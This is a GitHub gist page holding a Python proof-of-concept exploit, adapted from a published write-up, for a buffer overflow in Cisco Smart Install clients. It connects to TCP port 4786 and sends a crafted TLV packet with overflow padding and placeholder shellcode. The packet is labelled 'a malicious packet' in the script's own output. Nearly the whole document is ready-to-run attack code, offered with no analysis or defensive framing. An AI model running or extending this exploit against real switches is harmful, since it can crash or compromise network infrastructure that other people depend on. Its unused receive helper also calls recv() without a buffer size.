Skip to content

Instantly share code, notes, and snippets.

@smrx86
Created April 9, 2018 14:24
Show Gist options
  • Save smrx86/85529935c330df95d851ee279fb1d099 to your computer and use it in GitHub Desktop.
Save smrx86/85529935c330df95d851ee279fb1d099 to your computer and use it in GitHub Desktop.
adaptation https://embedi.com/blog/cisco-smart-install-remote-code-execution/ from optparse module requirement to argparse.
# smi_ibc_init_discovery_BoF.py
import socket
import struct
import argparse
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('-t','--target', help='Smart Install Client', action='store', required=True)
parser.add_argument('-p','--port', type=int, help='Port of Client', default=4786 )
return parser.parse_args()
def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'):
return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v
def send_packet(sock, packet):
sock.send(packet)
def receive(sock):
return sock.recv()
if __name__ == "__main__":
args = parse_args()
print "[*] Connecting to Smart Install Client ", args.target, "port", args.port
con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con.connect((args.target, args.port))
payload = 'BBBB' * 44
shellcode = 'D' * 2048
data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload
tlv_1 = craft_tlv(0x00000001, data)
tlv_2 = shellcode
hdr = '\x00\x00\x00\x01' # msg_from
hdr += '\x00\x00\x00\x01' # version
hdr += '\x00\x00\x00\x07' # msg_hdr_type
hdr += struct.pack('>I', len(data)) # data_length
pkt = hdr + tlv_1 + tlv_2
print "[*] Send a malicious packet"
send_packet(con, pkt)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment